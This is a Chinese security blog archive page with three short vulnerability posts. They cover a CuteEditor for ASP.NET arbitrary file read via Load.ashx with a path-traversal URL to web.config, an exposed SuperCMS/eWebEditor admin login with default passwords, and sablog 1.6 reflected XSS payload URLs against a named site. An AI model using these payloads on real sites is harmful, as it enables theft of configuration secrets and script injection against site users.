存档

文章标签 ‘漏洞’

Cute Editor for ASP.NET vulnerability

2009年5月22日 5 条评论

####### by woyigui #######
#### www.woyigui.cn  ######

一、漏洞描述:
     CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。
   但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。

二、官方地址:
      http://cutesoft.net/
      http://cuteeditor.51aspx.com/

三、利用方法:

    http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

分类: 网络安全 标签:

SuperCMS 上传漏洞!

2008年6月26日 没有评论

from:%5c
关键字:SuperCMS.asp
Powered by SuperCMS

SuperCMS新闻文章内容管理系统 v1.0
也是无意间发现的,看没有人发布,我就先发出来了!
http://URL/CmsEditor/Admin_Login.asp
使用了eWebEditor编辑器,粗心的站长可能没注意更改编辑器管理员的默认密码 以及数据库位置导致。
一般来说删除掉登陆页面 admin_login.asp 或者是对数据库取消写入权限,就应该是没有啥问题了

分类: 网络安全 标签: ,

sablog 1.6 多个跨站漏洞

2008年4月3日 没有评论

来源:CNsHaRk‘s BLog
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1          

临时解决办法:         阅读全文…